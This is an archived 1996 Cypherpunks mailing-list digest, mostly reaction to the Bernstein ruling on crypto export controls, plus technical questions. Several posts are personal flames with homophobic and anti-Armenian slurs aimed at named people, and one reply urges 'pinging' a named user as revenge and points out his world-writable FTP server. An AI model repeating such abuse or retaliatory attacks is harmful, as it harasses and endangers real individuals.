In-Reply-To: <Z2Z7yD10w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961219111805.1682A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Dimi wrote:

> ...John...Gilmore...What a maroon.

The logicidal proto-sexual, Dimi, LIES again!!!!!!!  John is sort
of a pinkish off-white.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 09:36:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: EFF: Bernstein court declares crypto restrictions unconstitutiona
In-Reply-To: <199612190153.RAA08519@toad.com>
Message-ID: <Z2Z7yD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I find it highly amusing how John "asshole censor" Gilmore claims credit
for himself and his discredited EFF, as if they had anything to do with
Patel's ruling.

What a maroon.

John Gilmore <gnu@toad.com> writes:

> 	COURT DECLARES CRYPTO RESTRICTIONS UNCONSTITUTIONAL
> 	    Free Speech Trumps Clinton Wiretap Plan
>
> December 18, 1996
>
>                                 Electronic Frontier Foundation Contacts:
>
>                                      Shari Steele, Staff Attorney
>                                       301/375-8856, ssteele@eff.org
>
>                                      John Gilmore, Founding Board Member
>                                       415/221-6524, gnu@toad.com
>
>                                      Cindy Cohn, McGlashan & Sarrail
>                                       415/341-2585, cindy@mcglashan.com
>
> San Francisco - On Monday, Judge Marilyn Hall Patel struck down Cold War
> export restrictions on the privacy technology called cryptography.  Her
> decision knocks out a major part of the Clinton Administration's
> effort to force companies to build "wiretap-ready" computers,
> set-top boxes, telephones, and consumer electronics.
>
> The decision is a victory for free speech, academic freedom, and the
> prevention of crime.  American scientists and engineers will now be
> free to collaborate with their peers in the United States and in other
> countries.  This will enable them to build a new generation of tools
> for protecting the privacy and security of communications.
>
> The Clinton Administration has been using the export restrictions to goad
> companies into building wiretap-ready "key recovery" technology.  In a
> November Executive Order, President Clinton offered limited
> administrative exemptions from these restrictions to companies which
> agree to undermine the privacy of their customers.  Federal District
> Judge Patel's ruling knocks both the carrot and the stick out of
> Clinton's hand, because the restrictions were unconstitutional in the
> first place.
>
> The Cold War law and regulations at issue in the case prevented
> American researchers and companies from exporting cryptographic
> software and hardware.  Export is normally thought of as the physical
> carrying of an object across a national border.  However, the
> regulations define "export" to include simple publication in the U.S.,
> as well as discussions with foreigners inside the U.S.  They also define
> "software" to include printed English-language descriptions and
> diagrams, as well as the traditional machine-readable object code and
> human-readable source code.
>
> The secretive National Security Agency has built up an arcane web of
> complex and confusing laws, regulations, standards, and secret
> interpretations for years.  These are used to force, persuade, or
> confuse individuals, companies, and government departments into making
> it easy for NSA to wiretap and decode all kinds of communications.
> Their tendrils reach deep into the White House, into numerous Federal
> agencies, and into the Congressional Intelligence Committees.  In
> recent years this web is unraveling in the face of increasing
> visibility, vocal public disagreement with the spy agency's goals,
> commercial and political pressure, and judicial scrutiny.
>
> Civil libertarians have long argued that encryption should be widely
> deployed on the Internet and throughout society to protect privacy,
> prove the authenticity of transactions, and improve computer security.
> Industry has argued that the restrictions hobble them in building
> secure products, both for U.S. and worldwide use, risking America's
> current dominant position in computer technology.  Government
> officials in the FBI and NSA argue that the technology is too
> dangerous to permit citizens to use it, because it provides privacy to
> criminals as well as ordinary citizens.
>
> "We're pleased that Judge Patel understands that our national security
> requires protecting our basic rights of free speech and privacy," said
> John Gilmore, co-founder of the Electronic Frontier Foundation, which
> backed the suit.  "There's no sense in `burning the Constitution in
> order to save it'.  The secretive bureaucrats who have restricted these
> rights for decades in the name of national security must come to a
> larger understanding of how to support and preserve our democracy."
>
> 	Reactions to the decision
>
> "This is a positive sign in the crypto wars -- the first rational
> statement concerning crypto policy to come out of any part of the
> government," said Jim Bidzos, President of RSA Data Security, one of
> the companies most affected by crypto policy.
>
> "It's nice to see that the executive branch does not get to decide
> whether we have the right of free speech," said Philip Zimmermann,
> Chairman of PGP, Inc.  "It shows that my own common sense
> interpretation of the constitution was correct five years ago when I
> thought it was safe to publish my own software, PGP.  If only US
> Customs had seen it that way."  Mr. Zimmermann is a civil libertarian
> who was investigated by the government under these laws when he wrote
> and gave away a program for protecting the privacy of e-mail.  His
> "Pretty Good Privacy" program is used by human rights activists
> worldwide to protect their workers and informants from torture and
> murder by their own countries' secret police.
>
> "Judge Patel's decision furthers our efforts to enable secure electronic
> commerce," said Asim Abdullah, executive director of CommerceNet.
>
> Jerry Berman, Executive Director of the Center for Democracy and
> Technology, a Washington-based Internet advocacy group, hailed the
> victory.  "The Bernstein ruling illustrates that the Administration
> continues to embrace an encryption policy that is not only unwise, but
> also unconstitutional.  We congratulate Dan Bernstein, the Electronic
> Frontier Foundation, and all of the supporters who made this victory
> for free speech and privacy on the Internet possible."
>
> "The ability to publish is required in any vibrant academic discipline,"
> This ruling re-affirming our obvious academic right will help American
> researchers publish without worrying," said Bruce Schneier, author of
> the popular textbook _Applied Cryptography_, and a director of the
> International Association for Cryptologic Research, a professional
> organization of cryptographers.
>
> Kevin McCurley, President of the International Association for
> Cryptologic Research, said, "Basic research to further the
> understanding of fundamental notions in information should be welcomed
> by our society.  The expression of such work is closely related to one
> of the fundamental values of our society, namely freedom of speech."
>
> 	Effect of the decision
>
> Judge Patel's decision today only legally applies to Prof. Bernstein.
> Other people and companies are still technically required to follow
> the export restrictions when speaking or publishing about
> cryptography, or when speaking or publishing cryptographic source
> code.  However, the decision sends a strong signal that if the
> government tried to enforce these rules against other people, the
> courts are likely to strike them down again.
>
> Judge Patel has specifically not decided whether the export controls
> on object code (the executable form of computer programs which source
> code is automatically translated into) are constitutional.  Existing
> export controls will continue to apply to runnable software products,
> such as Netscape's broswer, until another court case challenges that
> part of the restrictions.
>
> 	Background on the case
>
> The plaintiff in the case, Daniel J. Bernstein, Research Assistant
> Professor at the University of Illinois at Chicago, developed an
> "encryption algorithm" (a recipe or set of instructions) that he
> wanted to publish in printed journals as well as on the Internet.
> Bernstein sued the government, claiming that the government's
> requirements that he register as an arms dealer and seek government
> permission before publication was a violation of his First Amendment
> right of free speech.  This is required by the Arms Export Control Act
> and its implementing regulations, the International Traffic in Arms
> Regulations.
>
> In the first phase of this litigation, the government argued that
> since Bernstein's ideas were expressed, in part, in computer language
> (source code), they were not protected by the First Amendment.  On
> April 15, 1996, Judge Patel rejected that argument and held for the
> first time that computer source code is protected speech for purposes
> of the First Amendment.
>
> 	Details of Monday's Decision
>
> Judge Patel ruled that the Arms Export Control Act is an
> unconstitutional prior restraint on speech, because it requires
> Bernstein to submit his ideas about cryptography to the government for
> review, to register as an arms dealer, and to apply for and obtain from
> the government a license to publish his ideas.  Using the Pentagon
> Papers case as precedent, she ruled that the government's "interest of
> national security alone does not justify a prior restraint." Under the
> Constitution, he is now free to publish his ideas without asking the
> government's permission first.
>
> Judge Patel also held that the government's required licensing
> procedure fails to provide adequate procedural safeguards.  When the
> Government acts legally to suppress protected speech, it must reduce
> the chance of illegal censorship by the bureacrats involved.  Her
> decision states, "Because the ITAR licensing scheme fails to provide
> for a time limit on the licensing decision, for prompt judicial review
> and for a duty on the part of the ODTC to go to court and defend a
> denial of a license, the ITAR licensing scheme as applied to Category
> XIII(b) acts as an unconstitutional prior restraint in violation of the
> First Amendment."
>
> She also ruled that the export controls restrict speech based on the
> content of the speech, not for any other reason.  "Category XIII(b) is
> directed very specifically at applied scientific research and speech on
> the topic of encryption."  The Government had argued that it restricts
> the speech because of its function, not its content.
>
> The judge also found that the ITAR is vague, because it does not
> adequately define how information that is available to the public
> "through fundamental research in science and engineering" is exempt
> from the export restrictions.  "This subsection ...  does not give
> people ... a reasonable opportunity to know what is prohibited." The
> failure to precisely define what objects and actions are being
> regulated creates confusion and a chilling effect.  Bernstein has been
> unable to publish his encryption algorithm for over three years.  Many
> other cryptographers and ordinary programmers have also been restrained
> from publishing because of the vagueness of the ITAR.  Brian
> Behlendorf, a maintainer of the popular public domain "Apache" web
> server program, stated, "No cryptographic source code was ever
> distributed by the Apache project.  Despite this, the Apache server
> code was deemed by the NSA to violate the ITAR."  Judge Patel also
> adopted a narrower definition of the term "defense service" in order to
> save it from unconstitutional vagueness.
>
> The immediate effect of this decision is that Bernstein now is free to
> teach his January 13th cryptography class in his usual way.  He can
> post his class materials on the Internet, and discuss the upcoming
> class's materials with other professors, without being held in
> violation of the ITAR.  "I'm very pleased," Bernstein said.  "Now I
> won't have to tell my students to burn their notebooks."
>
>
> ABOUT THE ATTORNEYS
>
> Lead counsel on the case is Cindy Cohn of the San Mateo law firm of
> McGlashan & Sarrail, who is offering her services pro bono.  Major
> additional pro bono legal assistance is being provided by Lee Tien of
> Berkeley; M. Edward Ross of the San Francisco law firm of Steefel,
> Levitt & Weiss; James Wheaton and Elizabeth Pritzker of the First
> Amendment Project in Oakland; and Robert Corn-Revere of the
> Washington, DC, law firm of Hogan & Hartson.
>
>
> ABOUT THE ELECTRONIC FRONTIER FOUNDATION
>
> The Electronic Frontier Foundation (EFF) is a nonprofit civil
> liberties organization working in the public interest to protect
> privacy, free expression, and access to online resources and
> information.  EFF is a primary sponsor of the Bernstein case.  EFF
> helped to find Bernstein pro bono counsel, is a member of the
> Bernstein legal team, and helped collect members of the academic
> community and computer industry to support this case.
>
> Full text of the lawsuit and other paperwork filed in the case is
> available from EFF's online archives at
>
>         http://www.eff.org/pub/EFF/Policy/Crypto/ITAR_export/Bernstein_case/
>
> The full text of Monday's decision will be posted there as soon as
> we scan it in.


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 19 Dec 1996 11:41:40 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: permanent invasion of privacy
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961219194200Z-50408@INET-05-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Dale Thorn

Maybe if you got off your ass and did something worthwhile for society,
things would really change for the better.  But I won't hold my breath.
.............................................................


Don't be so presumptious, Dale.   I could be a secret cpunk NSA
tentacleH^H^H^H^agent on the list trying to discourage people from
pursuing certain ideas - like yours, for example. 


   ..
Blanc (LOL)

>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 19 Dec 1996 11:57:00 -0800 (PST)
To: cypherpunks
Subject: Bernstein case in the White House press conference
Message-ID: <199612191956.LAA27127@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


"What do you mean?  Of course the Emperor is wearing clothes!"

	John

http://library.whitehouse.gov/Briefings.cgi?date=0&briefing=0

December 19, 1996

PRESS BRIEFING BY MIKE MCCURRY

1:37 P.M. EST

                           THE WHITE HOUSE

                    Office of the Press Secretary
______________________________________________________________
For Immediate Release                      December 19, 1996


                          PRESS BRIEFING BY
                            MIKE MCCURRY


                         The Briefing Room

1:37 P.M. EST


             MR. MCCURRY:  I sit up here with no information to give,
empty.  Throw this thing away, this is useless.  (Laughter.)  I spent
the whole morning running around, just like you guys do, running
around trying to find somebody who knows something.  And I found a
whole lot of people who knew nothing.
...several pages deleted...

             Q    Mike, the Post story on the encryption -- federal
court decision on encryption software -- can you say what that does
to the government's rule-making effort and its plans to --

             MR. MCCURRY:  I am told that folks at Justice are trying
to figure that out.  They're analyzing the opinion now and seeing
what impact it has.  The preliminary read that I've got from them is
that it should not have any impact on it because of the way the case
is structured and the opinion was drawn.  But they're looking at it
more carefully now.

             Q    Mike, any comment on The New York Times report that
the United States is cracking on war criminals in Bosnia?
....a page deleted...

             Q    Thank you.

             MR. MCCURRY:  Thank you, Helen.  See you all tomorrow.
Maybe we'll have some real news tomorrow for a change.  (Laughter.)

             THE PRESS:  Thank you.

             END                          2:05 P.M. EST

#289-12/19




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 19 Dec 1996 12:08:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Executing Encrypted Code
Message-ID: <v02140b00aedf4a134af2@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At the last meeting references were made to processors which only
execute encrypted code.  Decryption occurs on chip.

If each chip has a unique public/secret key pair, and executes
authenticated code only, there are some interesting implications.

Software piracy becomes difficult, if not impossible.  Code is sold
on a processor by processor basis.  Code for a different physical
processor cannot be decrypted or executed.

Even if it is feasible to determine the secret key stored on the
chip, software piracy is still hard because it is not possible to
execute the code on another chip without authenticating it.

One could execute the code on another architecture entirely using an
emulator, but there would be a performance price paid.  It wouldn't
be worth the trouble for most software.

The manufacturer of the encrypted-code processor would protect its
instruction set using intellectual property law.  Given the high
price of a fab, it is entirely feasible to stop anybody from building
a new architecture which can execute the code about as fast as
the encrypting-code processor.

Viruses are not feasible if the authentication is strong.

Retrieval of the secret key is quite difficult.  Since the results
of the decryption never leave the chip, the recent attacks against
smart cards do not work.  (In the case of an error, the authentication
fails and the code does not execute.  No information has to leave
the chip.)

I would be interested to hear comments and corrections.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 19 Dec 1996 12:08:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Code+Data separation
Message-ID: <v02140b01aedf4fba9ec3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Allowing code and data to reside in the same areas of memory is
a nice convenience, but it makes security harder to implement
because it means code is modifiable and data can be created which
just happens to do bad things if it is executed.

Are there any modern processors which keep the code and data separated?

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 19 Dec 1996 13:12:54 -0800 (PST)
To: cypherpunks, cypherpunks-announce
Subject: Bernstein (export laws unconstitutional) decision update
Message-ID: <199612192112.NAA28059@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The full text of the decision is available at:
http:/www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/Legal/961206.decision

It's still full of scannos, but we wanted to get it out to you-all ASAP.

After further consultations with the attorneys, we are not sure
whether the decision has nationwide impact or whether it is limited
to the Northern District of California (which includes SF and Silicon
Valley).  Your Mileage May Vary -- check with your lawyer.

I hear from reporters that the Administration plans to announce its
reaction to the case this evening.

	John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SHARK <otaner@boun.edu.tr>
Date: Thu, 19 Dec 1996 03:31:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption ?
Message-ID: <Pine.A32.3.91.961219132500.5946D-100000@hamlin.cc.boun.edu.tr>
MIME-Version: 1.0
Content-Type: text/plain


I am a Mathematic student at Bosphorus University in Turkey.
I am interested in both computer applications and mathematical base of 
encryption.Where can I find this kind of staff on internet.
Is it necessary to have high level of mathematical background in order to 
deal with encryption??

By the way Is there any member of this list from Turkey?
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 19 Dec 1996 13:20:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Code+Data separation
Message-ID: <v02140b00aedf640e2ed6@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Allowing code and data to reside in the same areas of memory is
>a nice convenience, but it makes security harder to implement
>because it means code is modifiable and data can be created which
>just happens to do bad things if it is executed.
>
>Are there any modern processors which keep the code and data separated?
>
>Peter Hendrickson
>ph@netcom.com

I believe those that follow a Harvard architecture do this.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Thu, 19 Dec 1996 10:53:33 -0800 (PST)
To: Carl Johnson <toto@sk.sympatico.ca>
Subject: Re: Pretty Lousy Privacy
Message-ID: <3.0.32.19961219135408.00695a98@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:19 AM 12/19/96 -0800, you wrote:
:John H West wrote:
:> Are Dr DVT & Ray Arachelian the same pair who relentlessly
:> spammed the Net about three years ago.

[snip]

How soon can we expect Turkish and Armenian language modules for this beta?

What is status vis-a-vis export?

Thanks for the effort.
 
Cordially,

Alec                   

PGP Fingerprint:
Type bits/keyID    Date       User ID
pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
          Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
                             





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Psionic Damage <zerofaith@mail.geocities.com>
Date: Thu, 19 Dec 1996 14:01:40 -0800 (PST)
To: jamie@comet.net (jamie dyer)
Subject: Re: Mr. throw@yourself.up
Message-ID: <199612192201.OAA13662@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain





Try Pingin' his ass! Teach him a lesson.
At 06:39 AM 12/19/96 -0500, you wrote:
>
>
><HTML>
><BODY>
><CENTER>
><A HREF="http://www.geocities.com">Postage paid by: <IMG
SRC="http://www.geocities.com/pictures/newgeobt.gif"></A></CENTER>
></BODY>
></HTML>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>He's some little turd at telnor.net. Probably
>rex@telnor.net
> Throw ftp://ftp.telnor.net/pub/firewall/downloaders.HTM
>into your favorite browser. The ftp server is world writable too.
> Fuckin' IRC scum. 
> Oh yeah.
> Merry Christmas.
>
>
>jamie
>-
------------------------------------------------------------------------------
>jamie@comet.net |          Comet.Net		|  Send empty message 
>		|     Charlottesville, Va.  	|  to pgpkey@comet.net 
>		|        (804)295-2407		|  for pgp public key.
>	        |     http://www.comet.net	|
>"When buying and selling are controlled by legislation, the first things
>to be bought and sold are legislators"  -P.J. O'Rourke. 
>-
------------------------------------------------------------------------------
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQEVAwUBMrkpX/MDfTuunU79AQEeogf+Lq4bmq3klEUXHyMAozReqBJgX55AshYs
>SKh+dZUSEd4kXGM2zDbApLyO8htzxVlpMfcql8ra//9S55OqIOrI3EaVlm3MJ1jt
>q0oBLM93SNPUmExVAiR38LEybPi7m8qWpfPj6xQUrt20Jlh3FG1aZJJW0JxW1vHP
>QwsZCbp2QKifCYA+ej404HdsVjfPoC/IyTcZ/QTi5BOcXMLRbjkfLb3XuVjPfuiE
>5wrqqVnXmQpGOp9Pd1yUHvGUYcxKIRBqx23IwaxcIpfONtWsDfTlZixLGZNVOjc8
>SJmbOukE+KeOSJRElwrJFuWVTB+qtTyif9qksopmuj6vsCQpbrQ94g==
>=aDfS
>-----END PGP SIGNATURE-----
>
>
pSIONIC dAMAGE
Zer0 Faith Inc.
www.geocities.com/SiliconValley/Heights/2608
H/P/A/V/C ANTIVIRUS/COUNTERSECURITY
"ONLY THE ELITE SURVIVE!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 12:03:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Encryption ?
In-Reply-To: <32B960E3.1E2E@gte.net>
Message-ID: <0587yD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:

> SHARK wrote:
> >
> > I am a Mathematic student at Bosphorus University in Turkey.
> > I am interested in both computer applications and mathematical base of
> > encryption.Where can I find this kind of staff on internet.
> > Is it necessary to have high level of mathematical background in order to
> > deal with encryption??
> >
> > By the way Is there any member of this list from Turkey?
>
> There are a lot of NSA people here on cypherpunks, and they try very
> hard to control encryption, to make everyone think it is difficult, to
> discourage independent inquiry.
>
> That is the main reason they accuse people of being snakeoil vendors,
> to discourage people from inquiring about really new ideas, like some
> of my ideas for example.

There's also at least one hate-crazed Armenian who wants to suppress all
discussions of the genocide of 2,500,000 Turks, Kurds, and Sephardic Jews
by his bloodthirsty compatriots.

As for the hoodlums like Paul Bradley, who attack the crypto discussions
on this list, I'm sure he's too stupid to work for the NSA. He's just an idiot.

I used to work with one Armenian guy who used to work for the NSA and couldn't
get crypto clearance because he was Armenian - that's right, because he had
relatives back there. So he quit and went into business for himself. His wife
was also Armenian, but she was able to work for the NSA for many years.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 12:02:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: permanent invasion of privacy
In-Reply-To: <32B96006.13B0@gte.net>
Message-ID: <XD97yD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:

> blanc wrote:
> > From:   Dale Thorn, who hasn't a clue
> > [on why the cpunks of late haven't discussed children's point of view]:
> >         Not lately?  And why is that?
>
> > Don't know, Dale.   Would everyone please send a message to Dale,
> > explaining why you haven't been discussing this?
>
> If all you want to be is an asshole, why do you bother with me?
> Surely you could pick a more "respected" target, yes?
> Looks like you:
> 1. Don't have anything to do, and
> 2. Feel insecure, and
> 3. Feel inferior to me (wonder why), and
> 4. Don't have any real answers.

Yes, Blanc is a typical ignorant "cypher punk".  What a maroon.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 12:01:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: The virus I got...
In-Reply-To: <n1361132540.96106@mail.ndhm.gtegsc.com>
Message-ID: <3F97yD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com> writes:

> You already had the Monkey (or whatever) virus.  It was not included in the
> file distributed to the list.  The file was a pure Trojan, not infector.

The distinction is too subtle for the jerks who call themselves "cypher punks".

"I spilled coffe on my floppy disk. Is it now infected with a virus?"
                                                  - Timmy May

"Never use floppy disk for plate jobs if they contain sikrit data."
                                                  - John Gilmore

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 12:01:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: EFF: Bernstein court declares crypto restrictions unconstitutiona
In-Reply-To: <Pine.SUN.3.91.961219111805.1682A-100000@crl.crl.com>
Message-ID: <sq97yD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
>
> > ...John...Gilmore...What a maroon.
>
> The logicidal proto-sexual, Dimi, LIES again!!!!!!!  John is sort
> of a pinkish off-white.

Is John a real blonde?  His beard looks very unnatural.  Does he or doesn't he?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 12:10:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Cypher punks'" sexual preferences
Message-ID: <DX97yD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> Bruce Schneier <schneier@counterpane.com> writes:
>
> > John Gilmore just called me.
>
> Is Bruce gay?

Bruce has a very strange look in his eyes.

Perhaps he never has sex with anyone.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 19 Dec 1996 12:57:08 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: controlling web "cookies"
In-Reply-To: <199612192013.PAA27064@homeport.org>
Message-ID: <9612192102.AA00691@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


[note, I have rerouted this thread from coderpunks to cypherpunks where it is  
more appropriate...]

Adam Shostack writes:
>  	Posting hacks like this, while fun, tells the bad guys
>  (in Washington) how we're going to bypass their next
>  bits of nonsense.
>  	A number of cute hacks posted to cypherpunks after
>  Clipper II were defended against in Clipper III.  So
>  don't post your cute hacks against systems until they're ok'd
>  by the government or deployed.

Part of the reason past Clipper schemes haven't been deployed is because they  
had been shown not to work!  I say if there are weak spots, keep punching  
holes in them.  While Washington is spinning around trying to come up with a  
new-and-improved version, keep deploying good strong crypto and working the  
free-speech/civil-liberties angle in the courts.  By the GAKers come up with a  
workable solution (which is probably impossible given the politics involved  
in global-GAK) it will be too late.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 12:29:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: We won the Bernstein case.
In-Reply-To: <Pine.SUN.3.91.961219123717.22807A-100000@tipper.oit.unc.edu>
Message-ID: <io07yD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> writes:

> On Wed, 18 Dec 1996, Bruce Schneier wrote:
>
> > John Gilmore just called me.  There should be info on it on the EFF website
> > real soon now.
>
> shehechianu vekiyemanu hevigianu  lazman hazeh...

No wonder Jewhater Timmy May (fart) is rapidly approaching apoplexy! Omeyn.

There probably will be an orgy at the NYC punks meeting tonight,
which I'm not going to attend, not being a queer "cypher punk".

> So does this mean that anything can be exported as long as it's in source
> code, or is object code covered as well?

Try to find Judge Patel's district on the map.
Hint: North California is covered, North Carolina (and North Dakota) ain't.

> Simon
>
> ---
> Queen's Own Cypherpunk Regiment / 82nd Chairborne   - Gilmour's Irregulars

Pathetic queens indeed.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roderick Simpson <rod@wired.com>
Date: Thu, 19 Dec 1996 15:11:08 -0800 (PST)
To: com-priv@lists.psi.com
Subject: Ban spam outright?
Message-ID: <v03007801aedf7b8d194c@[204.62.132.248]>
MIME-Version: 1.0
Content-Type: text/plain


There is an interesting debate going on between Jamie Love and Scott Hazen
Mueller over how to deal with the problem of email spam (does this
constitute as one?) in Brain Tennis right now. Mueller would like to get
rid of spam outright, while Love's organization is on the verge of
recommending spam labeling legislation to the US Congress. Go to
www.braintennis.com to take a look.

Also, drop in to the open discussion area:

http://www.braintennis.com/cgi-bin/interact/replies_all?msg.33709

Best,
Rod


R o d e r i c k S i m p s o n                                rod@wired.com
A s s o c i a t e P r o d u c e r  T h e H o t W i r e d N e t w o r k
www.braintennis.com                            www.wiredsource.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 13:22:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: EFF: Bernstein court declares crypto restrictions unconstitutiona
In-Reply-To: <vZauyQ9zBQKW089yn@mantra.com>
Message-ID: <62B8yD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jai@mantra.com (Dr. Jai Maharaj) writes:
> On Thu, 19 Dec 96 11:37:58 EST,
> in message <Z2Z7yD10w165w@bwalk.dm.com>,
> dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote:
> > I find it highly amusing how John "asshole censor"
> > Gilmore claims credit for himself and his discredited
> > EFF, as if they had anything to do with Patel's
> > ruling.
> > What a maroon.
> > John Gilmore <gnu@toad.com> writes:
> >
> >> COURT DECLARES CRYPTO RESTRICTIONS UNCONSTITUTIONAL
> >>     Free Speech Trumps Clinton Wiretap Plan
> >> [...]
>
> Trying to steal glory from freedom martyr Zimmerman, I
> see.  The EFF were kicked out of, or their operation
> severely reduced on CompuServe, was it not a few years
> ago?

The EFF lost whatever little credibility is had left when John "asshole
censor" Gilmore (spit) admitted to content-based plug-pulling. What a jerk.

P.S. I wonder if Bon Giovanni is an EFF supporter. He sounds like one -
clueless and untruthful jerk, seeking to silence his mental superiors...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 19 Dec 1996 13:07:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Cryptography Policy and the Information Economy" draft available
Message-ID: <199612192111.QAA16788@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


